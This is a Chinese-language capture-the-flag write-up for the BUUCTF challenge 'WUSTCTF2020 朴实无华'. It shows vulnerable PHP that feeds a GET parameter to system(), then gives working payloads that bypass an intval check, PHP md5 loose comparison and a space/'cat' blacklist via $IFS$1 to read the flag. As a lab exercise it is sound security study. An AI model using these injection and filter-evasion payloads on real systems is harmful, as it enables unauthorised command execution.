BUUCTF Web [WUSTCTF2020]朴实无华1

[WUSTCTF2020]朴实无华1

启动靶机

 看了看源码什么也没什么发现,尝试是否可以访问robots.txt

 访问提到的php文件

抓个包看看 

BUUCTF Web [WUSTCTF2020]朴实无华1_第1张图片

发现了一个新的php文件(标橙),访问一下

BUUCTF Web [WUSTCTF2020]朴实无华1_第2张图片 

按住alt点击修复文字编码(解决火狐乱码问题)

 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.
"; }else{ die("金钱解决不了穷人的本质问题"); } }else{ die("去非洲吧"); } //level 2 if (isset($_GET['md5'])){ $md5=$_GET['md5']; if ($md5==md5($md5)) echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.
"; else die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲"); }else{ die("去非洲吧"); } //get flag if (isset($_GET['get_flag'])){ $get_flag = $_GET['get_flag']; if(!strstr($get_flag," ")){ $get_flag = str_ireplace("cat", "wctf2020", $get_flag); echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.
"; system($get_flag); }else{ die("快到非洲了"); } }else{ die("去非洲吧"); } ?>

 代码审计,可以发现GET传了num,md5,get_flag三个值。

num需要满足intval($num) < 2020 && intval($num + 1) > 2021  ;

md5需要满足md5后和本身想等;

get_flag参数设置了黑名单过滤空格,cat和wctf2020;

我一开始构造payload是:

/fl4g.php?num=100e2&md5=0e215962017&get_flag=ls

num采用科学计数法绕过intval(),md5通过弱类型绕过,然后ls查看当前目录下有哪些文件

感觉flag在最长的这个文件中(标灰) 

构造payload:

/fl4g.php?num=100e2&md5=0e215962017&get_flag=ca\t+fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

这个payload并没有成功,应该是+没有绕过空格限制,百度一下空格的其他绕过方法,测试了几个发现${IFS},$IFS$1 可以成功绕过

构造最终payload:

/fl4g.php?num=100e2&md5=0e215962017&get_flag=ca\t$IFS$1fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

 拿到flag(最下方)        flag{30c1f57f-68fa-4160-8b1c-ba2e603fac7c}

你可能感兴趣的:(BUUCTF,Web,安全)